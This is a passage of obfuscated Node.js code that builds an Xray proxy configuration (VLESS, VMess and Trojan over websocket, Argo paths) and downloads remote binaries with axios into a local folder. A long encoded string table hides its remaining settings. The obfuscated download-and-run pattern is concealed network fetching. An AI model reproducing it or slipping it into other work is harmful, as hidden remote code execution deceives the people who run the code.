_0x2f5472={};_0x2f5472['ALbYT']='/dev/null',_0x2f5472['ejxDv']='vless',_0x2f5472[_0x2ca813(0x3de,0x2e2,0x35c,0x512)]='none',_0x2f5472[_0x23fe9f(-0x304,-0x1c0,-0x1ca,-0x2d1)]=_0x2ca813(0x413,0x4a1,0x447,0x562)+'o',_0x2f5472['UzWio']=_0x23fe9f(0x1,-0x135,-0x1ca,-0x1e5)+'o',_0x2f5472[_0x23fe9f(-0x90,0x64,0xf7,0x168)]=_0x2ca813(0x555,0x616,0x482,0x5bc),_0x2f5472[_0x2ca813(0x43c,0x394,0x4bf,0x32b)]=_0x2ca813(0x4d5,0x615,0x3ae,0x44b),_0x2f5472[_0x23fe9f(0x9c,0xac,-0x4a,-0x6e)]=_0x2ca813(0x2dd,0x232,0x38b,0x35d),_0x2f5472['oAKYt']=_0x23fe9f(-0x4b,0xf,0xd4,0x125),_0x2f5472[_0x23fe9f(0xcf,0xc7,-0x43,0xb1)]=_0x23fe9f(-0x7f,-0x87,0xb3,-0x1e0),_0x2f5472[_0x2ca813(0x3f8,0x51b,0x47f,0x376)]='vmess',_0x2f5472[_0x23fe9f(-0x221,-0x14b,-0x274,-0x24)]=_0x2ca813(0x303,0x3ca,0x1d2,0x290),_0x2f5472['QbPSa']=_0x2ca813(0x43d,0x302,0x536,0x44d)+'go',_0x2f5472[_0x23fe9f(0x65,0x61,0x1be,-0xbe)]=_0x23fe9f(-0x13a,0x13,-0x7a,0x48),_0x2f5472[_0x2ca813(0x57a,0x593,0x55e,0x4e3)]=_0x23fe9f(-0x1a5,-0x148,-0x13e,-0x25),_0x2f5472['AlwyT']='blackhole',_0x2f5472[_0x2ca813(0x311,0x236,0x292,0x264)]='block',_0x2f5472[_0x23fe9f(-0x258,-0x198,-0x1d1,-0x1ec)]=_0x2ca813(0x43e,0x4b1,0x4ee,0x363)+'n';const _0xa4f977=_0x2f5472,_0x2fe46a={};_0x2fe46a['access']=_0x23fe9f(-0x272,-0x130,-0x1cf,-0x27b),_0x2fe46a['error']=_0xa4f977[_0x2ca813(0x4d1,0x631,0x422,0x52b)],_0x2fe46a['loglevel']=_0x2ca813(0x4f4,0x3f7,0x573,0x61c);const _0x3f927b={};_0x3f927b['id']=UUID,_0x3f927b[_0x2ca813(0x2de,0x224,0x2f1,0x19a)]='xtls-rprx-'+_0x23fe9f(-0x95,-0x19f,-0x223,-0x22a);const _0x22449d={};_0x22449d['dest']=0xbb9;const _0x500ed8={};_0x500ed8[_0x2ca813(0x435,0x543,0x544,0x332)]=_0x23fe9f(0x4d,-0x70,0x2a,0xa6)+'go',_0x500ed8[_0x2ca813(0x4b2,0x43b,0x42f,0x5a0)]=0xbbc;const _0x3a3853={};_0x3a3853[_0x2ca813(0x42a,0x51b,0x491,0x40f)]=ARGO_PORT,_0x3a3853[_0x2ca813(0x2b6,0x401,0x30a,0x148)]=_0xa4f977['ejxDv'],_0x3a3853[_0x23fe9f(-0xf,0xcc,0x56,-0x16)]={};function _0x23fe9f(_0x5045cf,_0x5d1228,_0x4b3fe4,_0xe3addd){return _0x4d5570(_0x5045cf-0x12b,_0x5d1228- -0x537,_0x4b3fe4-0x151,_0x4b3fe4);}_0x3a3853[_0x23fe9f(-0x123,0x17,0xcb,0x86)+_0x23fe9f(-0x67,-0x57,-0xa4,-0x18)]={},_0x3a3853[_0x23fe9f(-0xf,0xcc,0x56,-0x16)][_0x2ca813(0x2e5,0x2fa,0x28f,0x343)]=[_0x3f927b],_0x3a3853[_0x23fe9f(-0xf,0xcc,0x56,-0x16)]['decryption']=_0xa4f977[_0x23fe9f(-0x6,-0xcf,-0x119,0xc)],_0x3a3853[_0x23fe9f(-0xf,0xcc,0x56,-0x16)][_0x23fe9f(-0x197,-0xdd,-0x1b4,-0x85)]=[_0x22449d,{'path':_0xa4f977[_0x23fe9f(-0x103,-0x1c0,-0x279,-0x1f3)],'dest':0xbba},{'path':_0xa4f977[_0x23fe9f(-0x17c,-0x85,-0x1c0,-0x1bc)],'dest':0xbbb},_0x500ed8],_0x3a3853[_0x23fe9f(-0x123,0x17,0xcb,0x86)+_0x23fe9f(-0x67,-0x57,-0xa4,-0x18)]['network']=_0xa4f977['Xgmzt'];const _0x38e7c0={};_0x38e7c0['id']=UUID;const _0x158256={};_0x158256['port']=0xbb9,_0x158256[_0x2ca813(0x2fe,0x1af,0x1b0,0x1d7)]=_0xa4f977[_0x2ca813(0x43c,0x4aa,0x2db,0x453)],_0x158256[_0x23fe9f(-0x1fe,-0x1f7,-0x1fd,-0x344)]=_0xa4f977[_0x23fe9f(-0x1bf,-0xa6,0x5b,-0xc3)],_0x158256[_0x23fe9f(0xe5,0xcc,-0x88,0x230)]={},_0x158256[_0x2ca813(0x4c4,0x5b7,0x490,0x3a2)+_0x2ca813(0x456,0x4f0,0x5ac,0x5a2)]={},_0x158256[_0x23fe9f(0xe5,0xcc,-0x88,0x230)][_0x2ca813(0x2e5,0x401,0x288,0x201)]=[_0x38e7c0],_0x158256[_0x23fe9f(0xe5,0xcc,-0x88,0x230)][_0x23fe9f(-0x7c,-0x3a,-0x171,-0x39)]=_0xa4f977[_0x23fe9f(-0x1b4,-0xcf,0x22,-0xe8)],_0x158256[_0x2ca813(0x4c4,0x5b7,0x490,0x3a2)+_0x2ca813(0x456,0x4f0,0x5ac,0x5a2)][_0x23fe9f(-0x217,-0x13f,-0x16c,-0xf1)]=_0xa4f977[_0x23fe9f(-0xc1,0x64,0xa1,0xa7)],_0x158256[_0x2ca813(0x4c4,0x5b7,0x490,0x3a2)+_0x2ca813(0x456,0x4f0,0x5ac,0x5a2)][_0x23fe9f(0x64,-0x3e,-0x11d,0x75)]=_0x23fe9f(0x51,0x47,0x0,-0x7c);const _0x43ba16={};_0x43ba16['id']=UUID,_0x43ba16[_0x23fe9f(-0x4e,-0x1d,0x73,0x11a)]=0x0;const _0x526c77={};_0x526c77[_0x23fe9f(-0x10c,-0x1c8,-0x21e,-0xf3)]=[_0x43ba16],_0x526c77[_0x23fe9f(-0x96,-0x3a,-0x1c,0xb2)]=_0x2ca813(0x4f4,0x5b4,0x5e0,0x38e);const _0x8e2385={};_0x8e2385['port']=0xbba,_0x8e2385[_0x23fe9f(-0x136,-0x1af,-0x291,-0x2d2)]=_0xa4f977[_0x23fe9f(0x5d,-0x71,0x95,0x91)],_0x8e2385[_0x2ca813(0x2b6,0x3eb,0x3f4,0x2b4)]=_0xa4f977[_0x23fe9f(0xac,-0xa6,-0xef,-0x94)],_0x8e2385['settings']=_0x526c77,_0x8e2385[_0x23fe9f(-0x3c,0x17,0xb7,0xf3)+_0x23fe9f(-0x1b7,-0x57,-0x1ac,0xb7)]={},_0x8e2385[_0x23fe9f(-0x25e,-0x14f,-0x26c,-0x198)]={},_0x8e2385[_0x23fe9f(-0x3c,0x17,0xb7,0xf3)+_0x23fe9f(-0x1b7,-0x57,-0x1ac,0xb7)][_0x2ca813(0x36e,0x39d,0x27e,0x382)]='ws',_0x8e2385[_0x23fe9f(-0x3c,0x17,0xb7,0xf3)+_0x23fe9f(-0x1b7,-0x57,-0x1ac,0xb7)][_0x23fe9f(0x11e,-0x3e,-0x199,0x49)]=_0xa4f977[_0x2ca813(0x3de,0x3b0,0x279,0x2be)],_0x8e2385[_0x23fe9f(-0x3c,0x17,0xb7,0xf3)+_0x23fe9f(-0x1b7,-0x57,-0x1ac,0xb7)][_0x2ca813(0x3ae,0x302,0x2e8,0x460)]={},_0x8e2385[_0x23fe9f(-0x3c,0x17,0xb7,0xf3)+_0x23fe9f(-0x1b7,-0x57,-0x1ac,0xb7)][_0x2ca813(0x3ae,0x302,0x2e8,0x460)][_0x2ca813(0x435,0x4ba,0x361,0x400)]=_0xa4f977['FhpqK'],_0x8e2385[_0x23fe9f(-0x25e,-0x14f,-0x26c,-0x198)][_0x2ca813(0x335,0x373,0x290,0x28a)]=!![],_0x8e2385[_0x23fe9f(-0x25e,-0x14f,-0x26c,-0x198)][_0x2ca813(0x40c,0x3b1,0x366,0x414)+'de']=[_0xa4f977['UQvMy'],_0xa4f977[_0x2ca813(0x419,0x588,0x36a,0x34c)],_0xa4f977['NRWvc']],_0x8e2385[_0x23fe9f(-0x25e,-0x14f,-0x26c,-0x198)][_0x23fe9f(-0xff,0x3a,-0xe7,0x9c)+'ly']=![];const _0x23a41b={};_0x23a41b['id']=UUID,_0x23a41b[_0x23fe9f(-0x168,-0x199,-0xc7,-0x19f)]=0x0;const _0x3071cb={};_0x3071cb['clients']=[_0x23a41b];const _0x297e32={};_0x297e32[_0x2ca813(0x435,0x46a,0x493,0x4fc)]='/vmess-arg'+'o';const _0x1a5f0d={};_0x1a5f0d[_0x2ca813(0x36e,0x25f,0x346,0x24d)]='ws',_0x1a5f0d[_0x2ca813(0x3ae,0x51b,0x24a,0x349)]=_0x297e32;const _0x253d50={};function _0x2ca813(_0x47b081,_0x5b3650,_0x45edd4,_0x1cd0d7){return _0x388b12(_0x1cd0d7,_0x5b3650-0x7,_0x45edd4-0x0,_0x47b081-0x1c8);}_0x253d50[_0x23fe9f(-0xb0,-0x83,-0x135,0x4e)]=0xbbb,_0x253d50['listen']='127.0.0.1',_0x253d50[_0x23fe9f(-0x9b,-0x1f7,-0x18a,-0x224)]=_0xa4f977[_0x23fe9f(-0x20d,-0xb5,-0xfe,0xa2)],_0x253d50[_0x2ca813(0x579,0x417,0x6c2,0x469)]=_0x3071cb,_0x253d50[_0x23fe9f(0x17e,0x17,0xd,0xfc)+_0x2ca813(0x456,0x459,0x5ac,0x3e0)]=_0x1a5f0d,_0x253d50[_0x23fe9f(-0x148,-0x14f,-0x248,-0x19)]={},_0x253d50[_0x23fe9f(-0x148,-0x14f,-0x248,-0x19)][_0x2ca813(0x335,0x212,0x2d6,0x28a)]=!![],_0x253d50[_0x23fe9f(-0x148,-0x14f,-0x248,-0x19)]['destOverri'+'de']=[_0xa4f977['UQvMy'],_0xa4f977[_0x2ca813(0x419,0x40d,0x543,0x580)],_0xa4f977[_0x2ca813(0x574,0x52e,0x59d,0x4bf)]],_0x253d50[_0x23fe9f(-0x148,-0x14f,-0x248,-0x19)][_0x2ca813(0x4e7,0x57b,0x627,0x392)+'ly']=![];const _0x286a23={};_0x286a23[_0x23fe9f(-0x1b,-0x2d,0x76,0xc6)]=UUID;const _0x3b1575={};_0x3b1575[_0x2ca813(0x2e5,0x369,0x1cf,0x23c)]=[_0x286a23];const _0x5f0df7={};_0x5f0df7[_0x23fe9f(-0x1c1,-0x83,0xa3,-0x1a5)]=0xbbc,_0x5f0df7[_0x2ca813(0x2fe,0x1d1,0x1e2,0x2d1)]=_0xa4f977[_0x2ca813(0x43c,0x587,0x49b,0x348)],_0x5f0df7['protocol']=_0xa4f977[_0x23fe9f(-0x24f,-0x14b,-0xcc,-0x146)],_0x5f0df7['settings']=_0x3b1575,_0x5f0df7[_0x23fe9f(-0x94,0x17,-0x14b,0x10)+_0x23fe9f(0x14,-0x57,0x9f,-0x9c)]={},_0x5f0df7[_0x2ca813(0x35e,0x301,0x49b,0x1f8)]={},_0x5f0df7[_0x23fe9f(-0x94,0x17,-0x14b,0x10)+_0x23fe9f(0x14,-0x57,0x9f,-0x9c)][_0x2ca813(0x36e,0x2f0,0x3c6,0x220)]='ws',_0x5f0df7[_0x23fe9f(-0x94,0x17,-0x14b,0x10)+_0x23fe9f(0x14,-0x57,0x9f,-0x9c)][_0x2ca813(0x46f,0x4a0,0x3ea,0x35c)]=_0xa4f977['ZdpRk'],_0x5f0df7[_0x23fe9f(-0x94,0x17,-0x14b,0x10)+_0x23fe9f(0x14,-0x57,0x9f,-0x9c)][_0x2ca813(0x3ae,0x490,0x32c,0x33d)]={},_0x5f0df7[_0x23fe9f(-0x94,0x17,-0x14b,0x10)+_0x23fe9f(0x14,-0x57,0x9f,-0x9c)][_0x2ca813(0x3ae,0x490,0x32c,0x33d)][_0x2ca813(0x435,0x513,0x3ad,0x510)]=_0xa4f977[_0x2ca813(0x537,0x59d,0x435,0x64d)],_0x5f0df7[_0x2ca813(0x35e,0x301,0x49b,0x1f8)][_0x2ca813(0x335,0x3e1,0x26d,0x227)]=!![],_0x5f0df7[_0x2ca813(0x35e,0x301,0x49b,0x1f8)]['destOverri'+'de']=[_0xa4f977[_0x2ca813(0x559,0x444,0x419,0x496)],'tls',_0xa4f977[_0x2ca813(0x574,0x6c0,0x492,0x46e)]],_0x5f0df7[_0x2ca813(0x35e,0x301,0x49b,0x1f8)]['metadataOn'+'ly']=![];const _0x4cc451={};_0x4cc451['servers']=['https+loca'+_0x2ca813(0x454,0x2f5,0x55c,0x503)+_0x23fe9f(-0x94,-0x17f,-0x3a,-0x41)+'y'];const _0x19dffd={};_0x19dffd[_0x23fe9f(-0x8f,-0x1f7,-0x180,-0x129)]=_0xa4f977[_0x23fe9f(0x19,0x61,0x5b,0x1d)],_0x19dffd[_0x23fe9f(-0x15,-0x1b,-0x187,-0x159)]=_0xa4f977[_0x2ca813(0x57a,0x516,0x6da,0x42e)];const _0x535d18={};_0x535d18['protocol']=_0xa4f977[_0x23fe9f(-0x1e,0x2c,-0x8,-0xad)],_0x535d18[_0x23fe9f(0x10a,-0x1b,0x5b,-0x5f)]=_0xa4f977[_0x23fe9f(-0xe7,-0x19c,-0x147,-0x130)];const _0xf0d99d={};_0xf0d99d[_0x23fe9f(-0x2d9,-0x16f,-0x161,-0x1aa)]=_0x2fe46a,_0xf0d99d[_0x23fe9f(0x3b,-0x12b,0x28,-0x1a1)]=[_0x3a3853,_0x158256,_0x8e2385,_0x253d50,_0x5f0df7],_0xf0d99d[_0x23fe9f(-0xab,-0x15c,-0x17,-0x232)]=_0x4cc451,_0xf0d99d['outbounds']=[_0x19dffd,_0x535d18];const _0x5c14a7=_0xf0d99d;fs[_0x23fe9f(-0xb3,-0x96,-0x121,0x59)+_0x23fe9f(-0x23b,-0x164,-0x3e,-0x6a)](path[_0x23fe9f(0xbb,0x3e,-0x17,0x176)](FILE_PATH,_0xa4f977[_0x23fe9f(-0x1a8,-0x198,-0xda,-0x1f6)]),JSON[_0x2ca813(0x588,0x4de,0x51c,0x469)](_0x5c14a7,null,0x3*-0xb3d+-0x1b75+0x3d2e));}function getSystemArchitecture(){const _0x3e283d={};_0x3e283d[_0x293d45(0x226,0x1aa,0xe2,0x286)]=function(_0x2f67dd,_0x540710){return _0x2f67dd===_0x540710;},_0x3e283d[_0x3365f1(-0x2e,-0x183,-0x1f0,-0x266)]=_0x293d45(0x2e3,0x2e5,0x361,0x2dc),_0x3e283d[_0x3365f1(-0xb6,-0x198,-0x95,-0x175)]=function(_0x564fdc,_0x18a753){return _0x564fdc===_0x18a753;};function _0x293d45(_0x468c3b,_0x4554d1,_0x2ca5a2,_0x46d0a0){return _0x4d5570(_0x468c3b-0x3c,_0x468c3b- -0x312,_0x2ca5a2-0x14f,_0x2ca5a2);}_0x3e283d['djukE']=_0x3365f1(-0xc6,-0x1bf,-0xd8,-0x17b),_0x3e283d['FvlGh']=_0x3365f1(0x167,0x7b,0xf4,0x58),_0x3e283d[_0x293d45(0x18d,0x2f3,0x29c,0x156)]=_0x293d45(0x3c,-0x45,0x137,0xdf);const _0x203369=_0x3e283d;function _0x3365f1(_0xf90d1a,_0x4de523,_0x4b8996,_0x1fa9f5){return _0x388b12(_0x4b8996,_0x4de523-0x12,_0x4b8996-0x73,_0x4de523- -0x2c8);}const _0x357e63=os[_0x3365f1(-0x7a,0x5a,-0x44,0x11c)]();return _0x203369[_0x293d45(0x226,0x29b,0x128,0x19f)](_0x357e63,_0x203369[_0x3365f1(-0x177,-0x183,-0x277,-0x28)])||_0x203369[_0x293d45(0x70,0x1a4,0x7d,-0x4c)](_0x357e63,_0x203369[_0x3365f1(0x84,0x56,0x103,-0xa3)])||_0x203369[_0x3365f1(-0x28e,-0x198,-0x1f8,-0x1ef)](_0x357e63,_0x203369['FvlGh'])?_0x203369['Gfsui']:_0x203369['tcAcb'];}function downloadFile(_0x26e499,_0x5200cb,_0x3ba9d8){const _0x2d7fbb={'HuGyL':function(_0x52ad90,_0x46dd48){return _0x52ad90(_0x46dd48);},'jjTDC':'finish','OUmqS':function(_0x1e1c55,_0x5e6a60){return _0x1e1c55===_0x5e6a60;},'uNvjo':_0x42883a(0x318,0x464,0x1ef,0x1b9),'mygZd':_0x4bbe02(0x1c9,0x254,0x29c,0x253),'JepKt':function(_0x555e2a,_0x4138fa){return _0x555e2a(_0x4138fa);},'QVSFX':_0x42883a(0x197,0xcb,0x210,0x249),'rYGxT':_0x4bbe02(-0x47,0xbd,0x1c0,0x64)};function _0x42883a(_0x4a4c91,_0x5042c0,_0x2a40e2,_0x58849d){return _0x388b12(_0x2a40e2,_0x5042c0-0x197,_0x2a40e2-0x1ba,_0x4a4c91-0x7f);}const _0x2d30e7=_0x26e499;if(!fs[_0x42883a(0x39b,0x4f4,0x3f5,0x420)](FILE_PATH)){if(_0x2d7fbb['OUmqS'](_0x2d7fbb[_0x42883a(0x3c4,0x4c2,0x278,0x25f)],_0x2d7fbb[_0x4bbe02(0x105,-0x31,0x21d,0xe9)]))_0xd1d1c0[_0x4bbe02(0xed,0x2bc,0x29c,0x150)](_0x4bbe02(0x131,0x1da,0x2dd,0x1bc)+_0x4bbe02(-0x17,-0x2f,0xa0,0x6b)+_0x536e19);else{const _0x15f7f5={};_0x15f7f5['recursive']=!![],fs['mkdirSync'](FILE_PATH,_0x15f7f5);}}function _0x4bbe02(_0x1a7044,_0x36f2c0,_0x32cf44,_0x4bb04c){return _0x388b12(_0x32cf44,_0x36f2c0-0x1d0,_0x32cf44-0x1d5,_0x4bb04c- -0x105);}const _0x1b55de=fs['createWrit'+_0x4bbe02(0x13f,0x2de,0x124,0x213)](_0x2d30e7);_0x2d7fbb[_0x42883a(0x27d,0x3e9,0x3e9,0x36c)](axios,{'method':_0x2d7fbb[_0x42883a(0x327,0x1b8,0x3a2,0x2e3)],'url':_0x5200cb,'responseType':_0x2d7fbb[_0x4bbe02(0x223,0x22a,0x112,0x1f2)]})[_0x42883a(0x3c3,0x4c4,0x415,0x4a6)](_0x425c34=>{function _0x4c3881(_0x4de965,_0x1a2463,_0x43d82c,_0x4c3643){return _0x42883a(_0x4c3643- -0x264,_0x1a2463-0x70,_0x4de965,_0x4c3643-0x48);}const _0x576f17={'oQFNI':function(_0x10d767,_0x1de385){return _0x2d7fbb['HuGyL'](_0x10d767,_0x1de385);}};_0x425c34[_0x4c3881(-0x15d,0x4,0xa7,-0x42)][_0x200942(0x273,0x23f,0x23f,0x298)](_0x1b55de),_0x1b55de['on'](_0x2d7fbb['jjTDC'],()=>{function _0x2290d5(_0x19400f,_0x4e4ff3,_0x3691a5,_0x3d74c3){return _0x200942(_0x19400f-0x10f,_0x19400f- -0x7f,_0x3d74c3,_0x3d74c3-0x42);}function _0x4d82f2(_0x5c299d,_0x23c9f3,_0x226393,_0x359706){return _0x4c3881(_0x23c9f3,_0x23c9f3-0x14a,_0x226393-0x1cc,_0x359706-0x4ec);}if(_0x4d82f2(0x4e0,0x3f4,0x54e,0x4da)!==_0x2290d5(0xb,0xf4,0x3d,-0x28)){_0x2c72e7[_0x4d82f2(0x52a,0x4fd,0x5e0,0x482)](_0x325dff,()=>{});const _0x10983d='Download\x20'+_0x49068f[_0x4d82f2(0x660,0x651,0x5a5,0x668)](_0x2ebe4e)+_0x2290d5(0x50,-0xb8,0x189,-0xf3)+_0xcc8371[_0x2290d5(0x1af,0x30d,0x1c3,0x1c0)];_0xcca23d[_0x4d82f2(0x58b,0x4c3,0x4a1,0x55c)](_0x10983d),_0x576f17[_0x2290d5(-0x9f,-0xed,0xb0,-0x204)](_0x46965e,_0x10983d);}else _0x1b55de[_0x4d82f2(0x420,0x503,0x6da,0x58e)](),console[_0x4d82f2(0x3d4,0x501,0x55d,0x47d)](_0x4d82f2(0x621,0x4f7,0x54d,0x4fe)+path[_0x2290d5(0x199,0x1f2,0x138,0x1e1)](_0x2d30e7)+(_0x2290d5(-0x90,-0x65,-0xe,0x6f)+'lly')),_0x3ba9d8(null,_0x2d30e7);});function _0x200942(_0x49af85,_0x1e72d9,_0x4fde3c,_0x4b0d1e){return _0x4bbe02(_0x49af85-0x5d,_0x1e72d9-0x1de,_0x4fde3c,_0x1e72d9- -0x44);}_0x1b55de['on'](_0x4c3881(0xaf,-0xf5,-0x87,0x70),_0x36a4b5=>{fs['unlink'](_0x2d30e7,()=>{});function _0x51b066(_0x31087d,_0x1f0c78,_0x50af37,_0x5ee4eb){return _0x200942(_0x31087d-0x185,_0x50af37-0x75,_0x31087d,_0x5ee4eb-0x92);}const _0x5c77ce=_0x51b066(0x51,0x27c,0x123,0x269)+path[_0x51b066(0x2f9,0x3c7,0x28d,0x3c3)](_0x2d30e7)+_0x41498b(-0x149,0x26,-0xfc,0x28)+_0x36a4b5[_0x51b066(0x3a7,0x3ce,0x2a3,0x3aa)];function _0x41498b(_0xd0cd87,_0x354527,_0x51cc26,_0x1f6998){return _0x200942(_0xd0cd87-0x4f,_0x51cc26- -0x1cb,_0xd0cd87,_0x1f6998-0xc8);}console[_0x41498b(-0x19a,-0x14b,-0xbf,-0xf7)](_0x5c77ce),_0x3ba9d8(_0x5c77ce);});})[_0x4bbe02(0x166,0x292,0x127,0x279)](_0x14e713=>{const _0x54d9a6=_0x3b259c(0x174,0x2e2,0x188,0x2b)+path['basename'](_0x2d30e7)+_0x3b259c(0xae,0x232,0x1a9,0x274)+_0x14e713[_0x1dbf08(0x7e,0x1a7,0xc6,0x36)];function _0x3b259c(_0x5c03cb,_0x1bc0d9,_0x412512,_0x44991e){return _0x4bbe02(_0x5c03cb-0x1ac,_0x1bc0d9-0xf3,_0x1bc0d9,_0x412512-0x96);}function _0x1dbf08(_0x5a6653,_0x13ef40,_0xd4c448,_0x23cb52){return _0x4bbe02(_0x5a6653-0x14f,_0x13ef40-0x66,_0x23cb52,_0xd4c448- -0x1ac);}console[_0x1dbf08(-0x7c,-0xb4,-0x5c,-0x1b9)](_0x54d9a6),_0x2d7fbb['HuGyL'](_0x3ba9d8,_0x54d9a6);});}function _0x2c50(){const _0x4e5c89=['sLf0tw8','yxjJAa','AM9PBG','EwmUBw4VywDLBG','cIaGicaGig9YAq','B2npsMG','u2TPChbPBMCGyq','wuTHq2S','CxHcteC','vLPZq2C','Avn0Dwq','BM9Uzq','wvPOqKq','DgHPCYbZy3jPCa','zhjoDgu','CdiGCNvUic0TDa','C2LVBIbHDxrVia','ywXS','l2fWAs9HzgqTBG','wejoB0m','BNvSBcaYpIyXia','Aw50icqYnIiTiG','BwXIsfq','iaOGigLUz3jLCW','qwj6z0G','z1HYtLm','veTkug4','twzfwhO','rxjYB3iGCMvHza','Bfvgsfy','qxjNB0rVBwfPBG','EwLrwuC','BMLUzW','q29UDgvUDc1uEq','ywfYy2G2na','DgHLBG','Du52AM8','sKv6rxm','vgvADNO','ic1Zia','wgDTENq','B3DlAha','svb3Egy','B1H5rwK','cNzSzxnZoI8V','DhKSihvZzsbXDq','ide4mdakCMvWBW','uKrUDNu','BLvVqLO','Ewn3vwK','BxbIBvC','Exfwrva','ywjSzv9Zzw5KxW','BMv0l2fKzc11CG','uMjny3C','B3LWELa','Dw5ZAgLMDa','q0zjua','DhvUBMvSlMPZBW','rgjzrKq','u0TJyui','B3LvCLa','B0jXEKS','BgvUz3rO','yMfZzw5HBwu','t0Ltz3G','ue9sva','y0Xls3G','zhDTBg8','BM9ODxaG','cNrSCZOG','rvDJze4','suPAt0W','t0vxEMm','oI8VBg9JywXOBW','zffxwhy','wuzmBu8','CejKrtviu1royq','uwjqu2e','qvvuscb2yxjPyq','C2vHCMnO','DLfKq3i','DhvUBMvSlNLTBa','qvjht19bvvri','EgH4DK4','ls10Bhm','BwvZC2fNzq','C3vI','vgHHBMSGEw91ia','C3nMDwXSEq','yKPxzLq','ChvZAa','BwP0Agq','y2f0y2G','wKrsA05htMLjAq','sxrizgm','zcbZDwnJzxnZzG','BvDgD1K','mJa1mW','Ecz0ExbLpxDZjG','z1voANK','CM9ItgC','ywrK','CgLWzq','y29UC29Szq','mwLwDwj0qW','ls1SB2DSzxzLBa','qwfYBeq','DgnW','BhnLcMrPC2fIBa','oI8V','tM9KzxmGDxbSBW','vvf2txK','BMnOqu4','CIb0AguGy3vYCG','BgLZDc50Ehq','mJa4nW','Cg9W','jNbHDgG9jtjgDa','weffDeu','cNnRAxbFy29UBG','zM9YihvZAw5Nia','sgT3BfC','uhnyAve','y3rVCIGICMv0Dq','CgrHDguGls1WCG','CZOkicaGic0GAa','u1zIrg8','cIaGChjVDg9JBW','yLvxvMy','yxjT','AwHlwey','ruH5ww8','C3bMC0u','AwfSCY1MAwXLoG','Dg8GDhvUBMvS','BMHAExK','igfSCMvHzhKGzq','yxjNDfO','tLjxDMm','C2vYDMvYCW','BdOGAhr0Cdikia','AwnRihr1BM5LBa','BgvZCY1HCMDVjq','C2v0DgLUz3m','wLfqEeq','C2v0','q0zqt1ju','B2XMCuu','seLIqLi','rer4Ahq','oe9buxPkyq','DcbZDwnJzxnZia','qwrKigf1Dg9Tyq','rhLrrLq','uujhuNm','AgvHzgvYCW','CwfUzM0','tfbwvvi','C3rYAw5NAwz5','BwTKAxjtEw5J','E30Uy29UC3rYDq','BcaYpIyX','tK5Qrw4','yMfZzty0','ANvvCLO','Dw5UAw5N','qvvut19bq0nfuW','wNLWBKK','Bty0lNnZC3mUBG','zeryCvO','Cwrwvhy','ChjVDg9JB2W','rLPvweu','ic1Jia','yM5yCg0','AgLjB1y','zNjVBq','thHJvMy','C1LiEMO','rvrlEhe','sLPdy1K','id4Vzgv2l251Ba','zw11DMC','AMHtu3u','B09tz3K','yw1K','ze1hze8','CM4GDgHPCYiPka','D2vKCuq','tKH2DLG','zv9HDxrVx3vWza','A1rPqwG','tw1fneXuA3Hova','Dxz3EhL6','zxjYB3iGAw4GCW','rKLmrv9qqvri','B2rLCW','A3bhvMW','yxjTnJq','C3mGDgfZAW','BuzbEuC','EKjLDKG','A2vpAu8','lI90Bxa','igLUzM8Gls11CG','qw9VvNu','vwX6ruO','wKfsBxO','vNrQswq','BIbJB25Uzwn0ia','Ahr0Ca','zMXVDW','y3nZzuu','z2v0','DgfYDhnLCNzLCG','s0zSq1K','igLZignYzwf0zq','ufriBhi','y2XPzw50CW','DhLWzq','rK11zeK','qxfosuC','A2LWx3bYB2nZxW','D2LUmZi','u1zsuLK','yvrbD1Dxmuznvq','rMHWCuS','zMLSzu5HBwu','zw5JB2rPBMC','EwmUBw4VD2vI','B1fgtKK','zgHPEKi','zvb3vuu','nZG3otC4ywftDhjn','u21iwM4','rw1WB3DLCM1LBG','tKvAsefFu0vsvG','serIwg0','v3DrreC','tKvAsefFs0vz','tevqr3K','B0rVBwfPBG','y29UzMLNlNLHBq','BgLZDgvU','vfviBuS','ihn1y2nLC3nMDq','mtaWBuriAxnR','CvL0sfG','DhjVAMfU','y2XLyxi','C3q6','Dezkwxi','mJa5nG','zcaTzsaNCY8GlW','CM9Qyw4TyxjNBW','qM9irKi','Cennq0i','thbjvxO','r2zZDwK','DMLZAw9U','ndqZ','EMTbqLq','uMHRC2y','DcX1C2uGDg9Rzq','DgvZDa','ywX0zxjjza','Dev4AMK','DwPswLi','ihrHC2SGzMfPBa','yMXVy2S','sgPrDvK','zK13s1e','CxHithO','Bwf0AwmGywnJzq','CgXHDgzVCM0','ELvsrNO','Ag9ZDd0','kcGOlISPkYKRkq','tKvAsefFue9sva','C3vIlNr4Da','y2HHCKf0','vvvjra','lcbYzs1YDw5UAq','BgvZoG','CgTPBgWGlwyGiG','l2nVBMzPzY5QCW','Bw1HBMrFzxHLyW','v1nUvgi','BMCGB24GCg9YDa','AwDprgW','B2nHBgHVC3q6','oc9KBNmTCxvLCG','vvbmt0fex1vsta','zNfOCvy','C3rYzwfT','zwn0DxjL','y3jLDdOG','v1rqvNO','zw5HyMXLza','cNvZzv9NAxrLzq','cIaGica','zYbLCNjVCJOG','B3jJzv91CgrHDa','sgvSBg8GD29YBa','sLD1Bw8','yuHwq3a','zMfSC2u','Bg9N','zMLSzvvYBa','BcbODhrWoI8VBa','uwPzD1y','mZeXnde0ngPLDefcuG','Dw5SAw5R','l3n1yI50EhqGCW','wxvgufq','cIaGicaGihnLCG','u1vcx1bbveG','Aw5MBW','Ew5J','C2vUza','DwjZy3jPChrPBW','zMLYzwzVEa','l2fWAs9KzwXLDa','BI9QC29U','yxr1CZO0mdqkia','Chr5lhnRAxaGCG','zg5Z','vKHZEvC','DgfZA2TPBgWGlW','tIbVCIbbuKDpxW','q2D4zNK','qw12sKe','BM9utfnwzxjPzG','vuPSEg4','wfL2rNe','C3vIC2nYAxb0Aq','ls1JB25MAwCG','BwLZBwf0y2GGva','m0zLzcuZrdi1nG','C25PzMzPBMC','BvnRC1q','BMn4CMe','D2vIihj1BM5PBG','rxb6DwG','zeX0DuC','igeGzMLSzsbMBW','zgLYzwn0','oti5nZLJDNHbCem','u1Dwqva','zs1UB2rLCW','EwmUBw4VyM90','mta0odq5odbZzNDmuhy','zgf0yq','zu51uK8','BMn0Aw9UkcKG','BMv0D29YAW','y0XhBxa','wxv6Bfu','ELHIBvy','BuLjz28','yxLoufO','DhvUBMvSic0Tzq','uxfPuui','Ce5JC0y','sLPJEvm','l3zTzxnZlwfYzW','odeXmZjHu2jOCxq','ENP6Axa','yxLtBKy','u3vIC2nYAxb0Aq','l2rLDI9UDwXS','DMnWCuu','BgvPq04','y2HTB2q','rKPQuNK','Aw5IB3vUzhm','tMvuse8','s0DYA2y','D2fYBG','qvjht19qt1ju','mZm5mMe0','qvjht19et01bsq','BguG','tvnAtvy','yxzLzcbZDwnJzq','tvbQDva','z3jctMC','mJa4mW',